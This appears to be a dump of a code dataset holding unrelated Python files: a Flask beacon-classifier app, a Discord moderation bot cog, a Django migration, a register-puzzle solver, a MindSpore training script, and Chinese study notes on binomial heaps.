content
stringlengths
5
1.05M
from flask import Flask, request, render_template, url_for, redirect, send_file import helper_functions import db import datetime import celery_app from config import celery_config import classifiers import heatmap app = Flask(__name__) # celery_config(app) # celery = celery_app.make_celery(app) @app.route('/', methods=['GET','POST']) def index(): state = db.get_app_state() label = db.get_app_label() if state == 0: form = render_template('start_app.html', intake=state, label=label) else: form = render_template('stop_app.html', intake=state, label=label) return form @app.route('/startstop', methods=['POST']) def startstop(): if request.form['button'] == 'Start': label = request.form['label'] status = 1 if request.form['button'] == 'Stop': label = None status = 0 db.set_app_state(status, label) return redirect(url_for('index')) @app.route('/intake', methods=['POST']) def intake(): # check if allowed if not db.get_app_state(): return ("app status is 0. Data not processed\n", 403) else: data = request.get_data() db.insert_multiple_messages(data) return (data + '\n', 200) @app.route('/setup_classifier', methods=['POST', 'GET']) def setup_classifier(): return render_template('setup_classifier.html') @app.route('/init_classifier', methods=['POST']) def init_classifier(): # Collect data from request form (ASSUMES IS PROPER DATA) start_date = request.form['start_date'] end_date = request.form['end_date'] beacon_id = request.form['beacon_id'] gateway_list = request.form['gateway_list'] classifier_name = request.form['classifier_name'] # Process Data into correct form to run SVM start_date = datetime.datetime.strptime(start_date, "%Y-%m-%d %H:%M:%S") end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d %H:%M:%S") gateway_list = [whitespace.strip() for whitespace in gateway_list.split(',')] # Train SVM and check results classifier, standardize_scalar = classifiers.create_classifier(beacon_id, gateway_list, start_date, end_date, classifier_name) db.save_classifier(classifier, classifier_name, gateway_list, standardize_scalar) return render_template('use_classifier.html') @app.route('/use_classifier', methods=['POST', 'GET']) def use_classifier(): return render_template('use_classifier.html') @app.route('/predict_classifier', methods=['POST']) def predict_classifier(): # Collect data from request form (ASSUMES IS PROPER DATA) start_date = request.form['start_date'] end_date = request.form['end_date'] beacon_id = request.form['beacon_id'] classifier_name = request.form['classifier_name'] start_date = datetime.datetime.strptime(start_date, "%Y-%m-%d %H:%M:%S") end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d %H:%M:%S") results = classifiers.use_classifier(beacon_id, start_date, end_date, classifier_name) file_name = 'static/test.jpg' heatmap.store_heatmap(beacon_id, start_date, end_date, file_name) return send_file('static/test.jpg') @app.route('/timestamp_matching' , methods=[ 'GET']) def daily_processing(): raise NotImplementedError
import os import sys import time import random import discord from discord.ext import commands from discord.ext import tasks from discord import Member from discord.ext.commands import has_permissions from discord.ext.commands import MissingPermissions from discord.utils import find from discord.utils import get import asyncio import json class Main(commands.Cog): def __init__(self, client): self.client = client @commands.command(pass_context=True) @has_permissions(manage_messages=True) async def purge(self, ctx, arg): author = ctx.message.author.name embed=discord.Embed(title=f"Clearing...", description=f"Clearing {arg}", color=0xf20000) await ctx.send(embed=embed) amount1 = int(arg) time.sleep(1) await ctx.channel.purge(limit=amount1+2) @commands.command(pass_context=True) @has_permissions(kick_members=True) async def kick(self, ctx, user_name:discord.Member, *,args=None): author = ctx.author.name embed=discord.Embed(title="Player Kicked", description=f"**Player:** {user_name} \n**Reason:** {args} \n**Kicked By:** {author}", color=0xf20000) await user_name.kick(reason=args) await ctx.send(embed=embed) @commands.command(pass_context=True) @has_permissions(ban_members=True) async def ban(self, ctx, user_name:discord.Member, *,args=None): author = ctx.author.name embed=discord.Embed(title="Player Banned", description=f"**Player:** {user_name} \n**Reason:** {args} \n**Banned By:** {author}", color=0xf20000) await user_name.ban(reason=args) await ctx.send(embed=embed) @commands.command(pass_context=True) @has_permissions(ban_members=True) async def softban(self, ctx, user_name:discord.Member, *,args=None): await user_name.ban(reason=None) await asyncio.sleep(5) await user_name.unban(reason=None) @commands.command(pass_context=True) @has_permissions(kick_members=True) async def mute(self, ctx, user_name:discord.Member, args=None): # 683197335429316644 author = ctx.author.name role = discord.utils.get(user_name.guild.roles, name="Muted") await Member.add_roles(user_name, role) embed=discord.Embed(title="Player Muted", description=f"**Player:** {user_name} \n**Reason:** {args} \n**Muted By:** {author}", color=0xf20000) await ctx.send(embed=embed) @commands.command() @has_permissions(administrator=True) async def strike(self, ctx, faction, *,args): author = ctx.message.author.name author_id = ctx.message.author.id strike_channel = self.client.get_channel(727435494555910265) with open("/root/DiscordGit/Corrupt/cogs/db_faction.json", "r") as f: factions = json.load(f) target = str(faction) if not f'{target}' in factions: factions[f'{target}'] = {} factions[f'{target}'] = 1 embed=discord.Embed(title="Faction Strike", description=f"**Striked:** {faction} \n**Reason:** {args} \n**Total Strikes:** 1 \n**Strike By:** {author}", color=0xf20000) await strike_channel.send(embed=embed) else: warnam = int(factions[f'{target}']) warnam += 1 factions[f'{target}'] = warnam embed=discord.Embed(title="Faction Strike", description=f"**Striked:** {faction} \n**Reason:** {args} \n**Total Strikes:** {warnam} \n**Strike By:** {author}", color=0xf20000) await strike_channel.send(embed=embed) with open("db_faction.json", "w") as f: json.dump(factions, f) @commands.command(pass_context=True) @has_permissions(administrator=True) async def fire(self, ctx, user_name:discord.Member, *,args=None): for i in user_name.guild.roles: try: role = discord.utils.get(user_name.guild.roles, name=str(i)) await Member.remove_roles(user_name, role) except: pass pass member_role = discord.utils.get(user_name.guild.roles, name="Member") 
await Member.add_roles(user_name, member_role) await user_name.edit(nick=None) embed=discord.Embed(title=f"Fired {user_name}", description=f"{user_name} has been striped of all roles") await ctx.send(embed=embed) def setup(client): client.add_cog(Main(client))
# Generated by Django 3.2.10 on 2022-01-31 11:08 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('crudapp', '0077_auto_20220131_1549'), ] operations = [ migrations.AlterField( model_name='atm', name='inBankProcessing', field=models.IntegerField(choices=[(0, 'Внешний процессинг'), (1, 'Внутренний процессинг')], default=0, verbose_name='Процессинговый центр'), ), migrations.AlterField( model_name='atmimage', name='title', field=models.CharField(default='atm_img_20220131_16-08-50', max_length=200, null=True), ), migrations.AlterField( model_name='atmmodel', name='image', field=models.ImageField(blank=True, null=True, upload_to='model/model_img_20220131_16-08-50', verbose_name='Изображение'), ), ]
#!/usr/bin/python3 import sys # I heard you like registers # instructions have parts: # - register to modify # - whether to increase or decrease # - amount to change by # - 'if' # - register to check # - comparison operator # - amount to compare against # 'b inc 5 if a > 1' - check a, if greater than 1, add 5 to b def getValue(registers, name): if name not in registers: registers[name] = 0 return registers[name] def setValue(registers, name, value): registers[name] = value def addValue(registers, name, value): setValue(registers, name, getValue(registers, name) + value) def subValue(registers, name, value): setValue(registers, name, getValue(registers, name) - value) dirCase = { 'inc': addValue, 'dec': subValue, } def greaterThan(registers, a, b): return getValue(registers, a) > b def lessThan(registers, a, b): return getValue(registers, a) < b def equalTo(registers, a, b): return getValue(registers, a) == b def greaterThanEqualTo(registers, a, b): return not lessThan(registers, a, b) def lessThanEqualTo(registers, a, b): return not greaterThan(registers, a, b) def notEqualTo(registers, a, b): return not equalTo(registers, a, b) opCase = { '>': greaterThan, '<': lessThan, '==': equalTo, '>=': greaterThanEqualTo, '<=': lessThanEqualTo, '!=': notEqualTo, } # what is the largest amount in any register at any time? def largestValue(instructions): registers = {} value = "lame" for instruction in instructions: target, dir, mag, ifword, check, op, comp = instruction.split() if opCase[op](registers, check, int(comp)): dirCase[dir](registers, target, int(mag)) if value == "lame" or getValue(registers, target) > value: value = getValue(registers, target) return value # Unit tests for largestValue. tt = {'x': (['b inc 5 if a > 1', 'a inc 1 if b < 5', 'c dec -10 if a >= 1', 'c inc -20 if c == 10'], 10)} for k, v in tt.items(): result = largestValue(v[0]) if result != v[1]: print("FAIL: input ", v[0], ": expected ", v[1], ", got ", result, sep="") # The input is not checked for sanity, just existence. instructions = sys.stdin.readlines() if len(instructions) == 0: print("instructions missing!") sys.exit(1) print(largestValue(instructions))
import pytest @pytest.fixture(scope="module") def ansible_vars(host): return host.ansible.get_variables() def test_correct_package_versions_are_installed(host, ansible_vars): indy_node = host.package('indy-node') indy_plenum = host.package('indy-plenum') python_indy_crypto = host.package('python3-indy-crypto') libindy_crypto = host.package('libindy-crypto') assert indy_node.is_installed assert indy_plenum.is_installed assert python_indy_crypto.is_installed assert libindy_crypto.is_installed assert indy_node.version == ansible_vars['indy_node_ver'] assert indy_plenum.version == ansible_vars['indy_plenum_ver'] assert python_indy_crypto.version == ansible_vars['python_indy_crypto_ver'] assert libindy_crypto.version == ansible_vars['libindy_crypto_ver'] def test_node_service_is_enabled(host): assert host.service('indy-node').is_enabled
#-*- coding: utf-8 -*- import os import re import random def get_captcha(): path = os.path.join(os.path.dirname(__file__), 'captcha', 'jpgs/') file_list = get_file(path) uuid = re.findall("ques(.*?).jpg", file_list[random.randint(0, len(file_list)-1)])[0] answer = get_answer(uuid) return [uuid, answer[4]] def get_answer(uuid): path = os.path.join(os.path.dirname(__file__), 'captcha', 'ans/') filename = path+'ans'+uuid+'.txt' f = open(filename, 'r') answer = f.read() answer = re.findall('= (.*?)\\n', answer) return answer def get_file(path): for root, dir, filename in os.walk(path): file_list = filename return file_list def check_captcha(x, y, uuid): answer = get_answer(uuid) if(float(answer[0]) <= float(x) <= float(answer[0])+float(answer[2])): if(float(answer[1]) <= float(y) <= float(answer[1])+float(answer[3])): return True return False
# coding: utf-8 """ Base Parser =========== Base class of parsers. """ from lxml import etree class BaseParser(object): """ Abstract base class of the parsers classes. """ class _State(object): """ Parsing state for the converter (internal usage). .. versionadded:: 0.4.4 .. versionadded:: 0.5.0 """ def __init__(self): self.col_pos = 0 self.col = None self.row_pos = 0 self.row = None self.table = None reset = __init__ def next_col(self): self.col_pos += 1 self.col = None def next_row(self): self.col_pos = 0 self.col = None self.row_pos += 1 self.row = None def __init__(self, builder, encoding="utf-8", **options): """ Construct a base builder. :type builder: benker.builders.base_builder.BaseBuilder :param builder: Builder used by this parser to instantiate :class:`~benker.table.Table` objects. :param str encoding: XML encoding of the destination file (default: "utf-8"). :keyword options: Extra conversion options. See :meth:`~benker.converters.base_converter.BaseConverter.convert_file` to have a list of all possible options. """ self.builder = builder self.encoding = encoding self.options = options self._state = self._State() def parse_file(self, src_xml, dst_xml): """ Parse and convert the tables from one format to another. :param str src_xml: Source path of the XML file to convert. :param str dst_xml: Destination path of the XML file to produce. .. versionchanged:: 0.5.0 Always generate the XML declaration in the destination file. """ tree = etree.parse(src_xml) self.transform_tables(tree) self.builder.finalize_tree(tree) tree.write(dst_xml, xml_declaration=True, encoding=self.encoding, pretty_print=False) def transform_tables(self, tree): raise NotImplementedError def value_of(element, xpath, namespaces=None, default=None): """ Take the first value of a xpath evaluation. :type element: etree._Element :param element: Root element used to evaluate the xpath expression. :param str xpath: xpath expression. This expression will be evaluated using the *namespaces* namespaces. :type namespaces: dict[str, str] :param namespaces: Namespace map to use for the xpath evaluation. :param default: default value used if the xpath evaluation returns no result. :return: the first result or the *default* value. """ if element is None: return default nodes = element.xpath(xpath, namespaces=namespaces) return nodes[0] if nodes else default
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Training Interface""" import sys import os import argparse import copy from mindspore.communication.management import init, get_rank, get_group_size from mindspore.context import ParallelMode from mindspore.train.model import Model from mindspore.train.callback import TimeMonitor from mindspore.train.serialization import load_checkpoint, load_param_into_net from mindspore.train.loss_scale_manager import FixedLossScaleManager from mindspore.nn import SGD, RMSProp, Loss, Top1CategoricalAccuracy, \ Top5CategoricalAccuracy from mindspore import context, Tensor from src.dataset import create_dataset, create_dataset_val from src.utils import add_weight_decay, count_params, str2bool, get_lr from src.callback import EmaEvalCallBack, LossMonitor from src.loss import LabelSmoothingCrossEntropy from src.tinynet import tinynet parser = argparse.ArgumentParser(description='Training') # training parameters parser.add_argument('--data_path', type=str, default="", metavar="DIR", help='path to dataset') parser.add_argument('--model', default='tinynet_c', type=str, metavar='MODEL', help='Name of model to train (default: "tinynet_c"') parser.add_argument('--num-classes', type=int, default=1000, metavar='N', help='number of label classes (default: 1000)') parser.add_argument('-b', '--batch-size', type=int, default=32, metavar='N', help='input batch size for training (default: 32)') parser.add_argument('--drop', type=float, default=0.0, metavar='DROP', help='Dropout rate (default: 0.)') parser.add_argument('--drop-connect', type=float, default=0.0, metavar='DROP', help='Drop connect rate (default: 0.)') parser.add_argument('--opt', default='sgd', type=str, metavar='OPTIMIZER', help='Optimizer (default: "sgd"') parser.add_argument('--opt-eps', default=1e-8, type=float, metavar='EPSILON', help='Optimizer Epsilon (default: 1e-8)') parser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='SGD momentum (default: 0.9)') parser.add_argument('--weight-decay', type=float, default=0.0001, help='weight decay (default: 0.0001)') parser.add_argument('--lr', type=float, default=0.01, metavar='LR', help='learning rate (default: 0.01)') parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='LR', help='warmup learning rate (default: 0.0001)') parser.add_argument('--epochs', type=int, default=200, metavar='N', help='number of epochs to train (default: 2)') parser.add_argument('--decay-epochs', type=float, default=30, metavar='N', help='epoch interval to decay LR') parser.add_argument('--warmup-epochs', type=int, default=3, metavar='N', help='epochs to warmup LR, if scheduler supports') parser.add_argument('--decay-rate', '--dr', type=float, default=0.1, metavar='RATE', help='LR decay rate (default: 0.1)') parser.add_argument('--smoothing', type=float, default=0.1, help='label smoothing (default: 0.1)') 
parser.add_argument('--ema-decay', type=float, default=0, help='decay factor for model weights moving average \ (default: 0.999)') parser.add_argument('--amp_level', type=str, default='O0') parser.add_argument('--per_print_times', type=int, default=100) # batch norm parameters parser.add_argument('--bn-tf', action='store_true', default=False, help='Use Tensorflow BatchNorm defaults for models that \ support it (default: False)') parser.add_argument('--bn-momentum', type=float, default=None, help='BatchNorm momentum override (if not None)') parser.add_argument('--bn-eps', type=float, default=None, help='BatchNorm epsilon override (if not None)') # parallel parameters parser.add_argument('-j', '--workers', type=int, default=4, metavar='N', help='how many training processes to use (default: 1)') parser.add_argument('--distributed', action='store_true', default=False) parser.add_argument('--dataset_sink', action='store_true', default=True) # checkpoint config parser.add_argument('--ckpt', type=str, default=None) parser.add_argument('--ckpt_save_epoch', type=int, default=1) parser.add_argument('--loss_scale', type=int, default=1024, help='static loss scale') parser.add_argument('--train', type=str2bool, default=1, help='train or eval') parser.add_argument('--GPU', action='store_true', default=False, help='Use GPU for training (default: False)') if __name__ == '__main__': args = parser.parse_args() print(sys.argv) devid, args.rank_id, args.rank_size = 0, 0, 1 context.set_context(mode=context.GRAPH_MODE) if args.GPU: context.set_context(device_target='GPU') if args.distributed: if args.GPU: init("nccl") else: init() devid = int(os.getenv('DEVICE_ID')) context.set_context(device_target='Ascend', device_id=devid, reserve_class_name_in_scope=False) context.reset_auto_parallel_context() args.rank_id = get_rank() args.rank_size = get_group_size() context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True, device_num=args.rank_size) is_master = not args.distributed or (args.rank_id == 0) # parse model argument assert args.model.startswith("tinynet"), "Only Tinynet models are supported." 
_, sub_name = args.model.split("_") net = tinynet(sub_model=sub_name, num_classes=args.num_classes, drop_rate=args.drop, drop_connect_rate=args.drop_connect, global_pool="avg", bn_tf=args.bn_tf, bn_momentum=args.bn_momentum, bn_eps=args.bn_eps) if is_master: print("Total number of parameters:", count_params(net)) # input image size of the network input_size = net.default_cfg['input_size'][1] train_dataset = val_dataset = None train_data_url = os.path.join(args.data_path, 'train') val_data_url = os.path.join(args.data_path, 'val') val_dataset = create_dataset_val(args.batch_size, val_data_url, workers=args.workers, distributed=False, input_size=input_size) if args.train: train_dataset = create_dataset(args.batch_size, train_data_url, workers=args.workers, distributed=args.distributed, input_size=input_size) batches_per_epoch = train_dataset.get_dataset_size() loss = LabelSmoothingCrossEntropy(smooth_factor=args.smoothing, num_classes=args.num_classes) time_cb = TimeMonitor(data_size=batches_per_epoch) loss_scale_manager = FixedLossScaleManager(args.loss_scale, drop_overflow_update=False) lr_array = get_lr(base_lr=args.lr, total_epochs=args.epochs, steps_per_epoch=batches_per_epoch, decay_epochs=args.decay_epochs, decay_rate=args.decay_rate, warmup_epochs=args.warmup_epochs, warmup_lr_init=args.warmup_lr, global_epoch=0) lr = Tensor(lr_array) loss_cb = LossMonitor(lr_array, args.epochs, per_print_times=args.per_print_times, start_epoch=0) param_group = add_weight_decay(net, weight_decay=args.weight_decay) if is_master: print(f'Using {args.opt} optimizer') if args.opt == 'sgd': optimizer = SGD(param_group, learning_rate=lr, momentum=args.momentum, weight_decay=args.weight_decay, loss_scale=args.loss_scale) elif args.opt == 'rmsprop': optimizer = RMSProp(param_group, learning_rate=lr, decay=0.9, weight_decay=args.weight_decay, momentum=args.momentum, epsilon=args.opt_eps, loss_scale=args.loss_scale) loss.add_flags_recursive(fp32=True, fp16=False) eval_metrics = {'Validation-Loss': Loss(), 'Top1-Acc': Top1CategoricalAccuracy(), 'Top5-Acc': Top5CategoricalAccuracy()} if args.ckpt: ckpt = load_checkpoint(args.ckpt) load_param_into_net(net, ckpt) net.set_train(False) model = Model(net, loss, optimizer, metrics=eval_metrics, loss_scale_manager=loss_scale_manager, amp_level=args.amp_level) net_ema = copy.deepcopy(net) net_ema.set_train(False) assert args.ema_decay > 0, "EMA should be used in tinynet training." ema_cb = EmaEvalCallBack(network=net, ema_network=net_ema, loss_fn=loss, eval_dataset=val_dataset, decay=args.ema_decay, save_epoch=args.ckpt_save_epoch, dataset_sink_mode=args.dataset_sink, start_epoch=0) callbacks = [loss_cb, ema_cb, time_cb] if is_master else [] if is_master: print("Training on " + args.model + " with " + str(args.num_classes) + " classes") model.train(args.epochs, train_dataset, callbacks=callbacks, dataset_sink_mode=args.dataset_sink)
from .la import TDMA_LU, TDMA_Solve, PDMA_LU, PDMA_Solve, \ LU_Helmholtz, Solve_Helmholtz, LU_Biharmonic, Biharmonic_factor_pr, \ Biharmonic_Solve, TDMA_O_Solve, TDMA_O_LU, Poisson_Solve_ADD, \ FDMA_Solve, TwoDMA_Solve, FDMA_LU, DiagMA_Solve, \ TDMA_inner_solve, TDMA_O_inner_solve, DiagMA_inner_solve, \ PDMA_inner_solve, FDMA_inner_solve, TwoDMA_inner_solve, \ SolverGeneric1ND_solve_data from .Matvec import Helmholtz_matvec, Helmholtz_Neumann_matvec, Biharmonic_matvec from .outer import outer2D, outer3D from .applymask import apply_mask from .Cheb import chebval
# -*- coding: utf-8 -*- class TaxiException(Exception): pass class UsageError(TaxiException): pass class CancelException(TaxiException): pass class UndefinedAliasError(TaxiException): pass
# coding:utf-8 # usr/bin/python3 # python src/chapter19/chapter19note.py # python3 src/chapter19/chapter19note.py ''' Class Chapter19_1 Class Chapter19_2 ''' from __future__ import absolute_import, division, print_function import math as _math import random as _random import time as _time from copy import copy as _copy from copy import deepcopy as _deepcopy from random import randint as _randint import numpy as np from numpy import arange as _arange from numpy import array as _array from numpy import * if __name__ == '__main__': import binomialheap as bh else: from . import binomialheap as bh class Chapter19_1: ''' chpater19.1 note and function ''' def note(self): ''' Summary ==== Print chapter19.1 note Example ==== ```python Chapter19_1().note() ``` ''' print('chapter19.1 note as follow') print('第19章 二项堆') # !可合并堆(包括二叉堆、二项堆、斐波那契堆)的数据结构,这些数据结构支持下面五种操作 print('可合并堆(包括二叉堆、二项堆、斐波那契堆)的数据结构,这些数据结构支持下面五种操作') print('MAKE-HEAP():创建并返回一个不包含任何元素的新堆') print('INSERT(H,x):将结点x(其关键字域中已填入了内容)插入堆H中') print('MINIMUM(H):返回一个指向堆H中包含最小关键字的结点的指针') print('EXTRACT-MIN(H):将堆H中包含的最小关键字删除,并返回一个指向该结点的指针') print('UNION(H1,H2):创建并返回一个包含堆H1和H2中所有结点的新堆。同时H1和H2被这个操作\"删除\"') print('DECREASE-KEY(H, x, k):将新关键字值k(假定它不大于当前的关键字值)赋给堆H中的结点x') print('DELETE(H, x):从堆H中删除结点x') print(' 过程 |二叉堆(最坏情况)|二项堆(最坏情况)|斐波那契堆(平摊)|') print(' MAKE-HEAP() | Θ(1) | Θ(1) | Θ(1) |') print(' INSERT(H,x) | Θ(lgn) | Ω(lgn) | Θ(1) |') print(' MINIMUM(H) | Θ(1) | Ω(lgn) | Θ(1) |') print(' EXTRACT-MIN(H)| Θ(lgn) | Θ(lgn) | O(lgn) |') print(' UNION(H1,H2) | Θ(n) | Ω(lgn) | Θ(1) |') print(' DECREASE-KEY | Θ(lgn) | Θ(lgn) | Θ(1) |') print(' DELETE(H, x) | Θ(lgn) | Θ(lgn) | O(lgn) |') print('对操作SEARCH操作的支持方面看,二叉堆、二项堆、斐波那契堆都是低效的') print('19.1 二项树和二项堆') print('19.1.1 二项树') # !二项树Bk是一种递归定义的树。 print('二项树Bk是一种递归定义的树。') # !二项树B0只含包含一个结点。二项树Bk由两颗二项树Bk-1链接而成:其中一棵树的根的是另一棵树的根的最左孩子 print('二项树B0只含包含一个结点。二项树Bk由两颗二项树Bk-1链接而成:其中一棵树的根的是另一棵树的根的最左孩子') print('引理19.1(二项树的性质) 二项树Bk具有以下的性质') print('1) 共有2^k个结点') print('2) 树的高度为k') print('3) 在深度i处恰有(k i)个结点,其中i=0,1,2,...,k') print('4) 根的度数为k,它大于任何其他结点的度数;', '并且,如果根的子女从左到右编号为k-1,k-2,...,0,子女i是子树Bi的根') print('推论19.2 在一棵包含n个结点的二项树中,任意结点的最大度数为lgn') print('19.1.2 二项堆') print('二项堆H由一组满足下面的二项堆性质的二项树组成') print('(1) H中的每个二项树遵循最小堆性质:', '结点的关键字大于或等于其父结点的关键字,我们说这种树是最小堆有序的') print('(2) 对任意非负整数k,在H中至多有一棵二项树的根具有度数k') print('在一棵最小堆有序的二项树中,其根包含了树中最小的关键字') print('在包含n个结点的二项堆H中,包含至多[lgn]+1棵二项树') print('这样,二项堆H包含至多[lgn]+1棵二项树') print('包含13个结点的二项堆H。13的二进制表示为1101,', '故H包含了最小堆有序二项树B3,B2和B0,它们分别有8,4,1个结点,即共有13个结点') print('二项堆的表示') print(' 在二项堆的每个结点中,都有一个关键字域及其其他依应用要求而定的卫星数据') print(' 另外,每个结点x还包含了指向其父结点的指针p[x],指向其最做孩子的指针child[x]') print(' 以及指向x的紧右兄弟的指针sibling[x].如果结点x是根,则p[x]=None') print(' 如果结点x没有子女,则child[x]=None,如果x是其父结点的最右孩子,则sibling[x]=None') print(' 如果结点x是根,则p[x]=None,如果结点x没有子女,', '则child[x]=None,如果x是其父结点的最右孩子,', '则sibling[x]=None,每个结点x都包含域degree[x],即x的子女个数') print('一个二项堆中的各二项树被组织成一个链表,我们称之为根表。') print('在遍历根表时,各根的度数是严格递增的') print('根据第二个二项堆的性质,在一个n结点的二项堆中各根的度数构成了{0,1,...,[lgn]}的一个子集') print('对根结点来说与非结点根来说,sibling域的含义是不同的,如果x为根,则x.sibling指向根表中下一个根') print('像通常一样,如果x为根表中最后一个根,则x.sibling=None') print('练习19.1-1 假设x为一个二项堆中,某棵二项树中的一个结点,并假定sibling[x]!=None') print(' 如果x不是根,x.sibling.degree比x.degree多1,', '如果x是个根,则x.sibling.degree比x.degree多至少1,因为需要知道二项堆的二项树组成结构') print('练习19.1-2 如果x是二项堆的某棵二项树的非根结点,x.p.degree比x.degree大至多O(n)') print('练习19.1-3 假设一棵二项树Bk中的结点标为二进制形式。考虑深度i处标为l的一个结点x,且设j=k-i.') print(' 证明:在x的二进制表示中共有j个1.恰好包含j个1的二进制k串共有多少?', '证明x的度数与l的二进制表示中,最右0的右边的1的个数相同') # python src/chapter19/chapter19note.py # python3 src/chapter19/chapter19note.py class 
Chapter19_2: ''' chpater19.2 note and function ''' def buildheap(self): ''' 构造19.2-2的形式二项堆 ''' heap = bh.BinomialHeap() root1 = bh.BinomialHeapNode(25, 0) # 根结点 heap.head = root1 root2 = bh.BinomialHeapNode(12, 2) root3 = bh.BinomialHeapNode(6, 4) heap.head.sibling = root2 root2.sibling = root3 root2.child = bh.BinomialHeapNode(37, 1, root2) root2.child.sibling = bh.BinomialHeapNode(18, 0, root2) root2.child.child = bh.BinomialHeapNode( 41, 0, root2.child) root3.child = bh.BinomialHeapNode(10, 3, root3) root3.child.sibling = bh.BinomialHeapNode(8, 2, root3) root3.child.sibling.sibling = bh.BinomialHeapNode(14, 1, root3) root3.child.sibling.sibling.sibling = bh.BinomialHeapNode(29, 0, root3) node = root3.child node.child = bh.BinomialHeapNode(16, 2, node) node.child.sibling = bh.BinomialHeapNode(28, 1, node) node.child.sibling.sibling = bh.BinomialHeapNode(13, 0, node) node = root3.child.sibling node.child = bh.BinomialHeapNode(11, 1, node) node.child.sibling = bh.BinomialHeapNode(17, 0, node) node.child.child = bh.BinomialHeapNode(27, 0, node.child) node = root3.child.sibling.sibling node.child = bh.BinomialHeapNode(38, 0, node) node = root3.child.child node.child = bh.BinomialHeapNode(26, 1, node) node.child.sibling = bh.BinomialHeapNode(23, 0, node) node.child.child = bh.BinomialHeapNode(42, 0, node.child) node = root3.child.child.sibling node.child = bh.BinomialHeapNode(77, 0, node) return heap def note(self): ''' Summary ==== Print chapter19.2 note Example ==== ```python Chapter19_2().note() ``` ''' print('chapter19.2 note as follow') print('19.2 对二项堆的操作') print('创建一个新二项堆') print(' 为了构造一个空的二项堆') print('寻找最小关键字') print(' 过程BINOMIAL-HEAP-MINIMUM返回一个指针,', '指向包含n个结点的二项堆H中具有最小关键字的结点', '这个实现假设没有一个关键字为无穷') print(' 因为一个二项堆是最小堆有序的,故最小关键字必在根结点中') print(' 过程BINOMIAL-HEAP-MINIMUM检查所有的根(至多[lgn]+1),将当前最小者存于min中') print(' 而将指向当前最小者的指针存于y之中。BINOMIAL-HEAP-MINIMUM返回一个指向具有关键字1的结点的指针') print(' 因为至多要检查[lgn]+1个根,所以BINOMIAL-HEAP-MINIMUM的运行时间为O(lgn)') print('合并两个二项堆') print(' 合并两个二项堆的操作可用作后面大部分操作的一个子程序。') print(' 过程BINOMIAL-HEAP-UNION反复连接根结点的度数相同的各二项树') print(' LINK操作将以结点y为根的Bk-1树与以结点z为根的Bk-1树连接起来') print(' BINOMIAL-HEAP-UNION搓成合并H1和H2并返回结果堆,在合并过程中,同时也破坏了H1和H2的表示') print(' 还使用了辅助过程BINOMIAL-HEAP-MERGE,来讲H1和H2的根表合并成一个按度数的单调递增次序排列的链表') print('练习19.2-1 写出BINOMIAL-HEAP-MERGE的伪代码 代码已经给出') heap = bh.BinomialHeap() heap = heap.insertkey(1) heap = heap.insertkey(2) heap = heap.insertkey(3) print(heap.head) print('练习19.2-2 将关键字24的结点插入如图19-7d的二项树当中') heap = self.buildheap() print(heap.head) heap = heap.insertkey(24) print(heap.head) print(' 所得结果二项堆就是24变成了头结点,25变成24的子结点') heap = heap.deletekey(28) print('练习19.2-3 删除28关键字整个二项堆结构与原来很不相同') print('练习19.2-4 讨论使用如下循环不变式BINOMIAL-HEAP-UNION的正确性') print(' x指向下列之一的根') print(' 1.该度数下唯一的根') print(' 2.该度数下仅有两根中的第一个') print(' 3.该度数下仅有三个根中的第一或第二个') print('练习19.2-5 如果关键字的值可以是无穷,为什么过程BINOMIAL-HEAP-MINIMUM可能无法工作') print('练习19.2-6 假设无法表示出关键字负无穷') print(' 重写BINOMIAL-HEAP-DELETE过程,使之在这种情况下能正确地工作,运行时间仍然为O(lgn)') print('练习19.2-7 类似的') print(' 讨论二项堆上的插入与一个二进制数增值的关系') print(' 合并两个二项堆与将两个二进制数相加之间的关系') print('练习19.2-8 略') print('练习19.2-9 证明:如果将根表按度数排成严格递减序(而不是严格递增序)保存') print(' 仍可以在不改变渐进运行时间的前提下实现每一种二项堆操作') print('练习19.2-10 略') print('思考题19-1 2-3-4堆') print(' 2-3-4树,其中每个内结点(非根可能)有两个、三个或四个子女,且所有的叶结点的深度相同') print(' 2-3-4堆与2-3-4树有些不同之处。在2-3-4堆中,关键字仅存在于叶结点中,', '且每个叶结点x仅包含一个关键字于其x.key域中') print(' 另外,叶结点中的关键字之间没有什么特别的次序;亦即,从左至右看,各关键字可以排成任何次序') print(' 每个内结点x包含一个值x.small,它等于以x为根的子树的各叶结点中所存储的最小关键字') print(' 根r包含了一个r.height域,即树的高度。最后,2-3-4堆主要是在主存中的,故无需任何磁盘读写') print(' 2-3-4堆应该包含如下操作,其中每个操作的运行时间都为O(lgn)') 
print(' (a) MINIMUM,返回一个指向最小关键字的叶结点的指针') print(' (b) DECREASE-KEY,将某一给定叶结点x的关键字减小为一个给定的值k<=x.key') print(' (c) INSERT,插入具有关键字k的叶结点x') print(' (d) DELETE,删除一给定叶结点x') print(' (e) EXTRACT-MIN,抽取具有最小关键字的叶结点') print(' (f) UNION,合并两个2-3-4堆,返回一个2-3-4堆并破坏输入堆') print('思考题19-2 采用二项堆的最小生成树算法') print(' 第23章要介绍两个在无向图中寻找最小生成树的算法') print(' 可以利用二项堆来设计一个不同的最小生成树算法') print(' 请说明如何用二项堆来实现此算法,以便管理点集合边集。需要对二项堆的表示做改变嘛') # python src/chapter19/chapter19note.py # python3 src/chapter19/chapter19note.py chapter19_1 = Chapter19_1() chapter19_2 = Chapter19_2() def printchapter19note(): ''' print chapter19 note. ''' print('Run main : single chapter nineteen!') chapter19_1.note() chapter19_2.note() # python src/chapter19/chapter19note.py # python3 src/chapter19/chapter19note.py if __name__ == '__main__': printchapter19note() else: pass
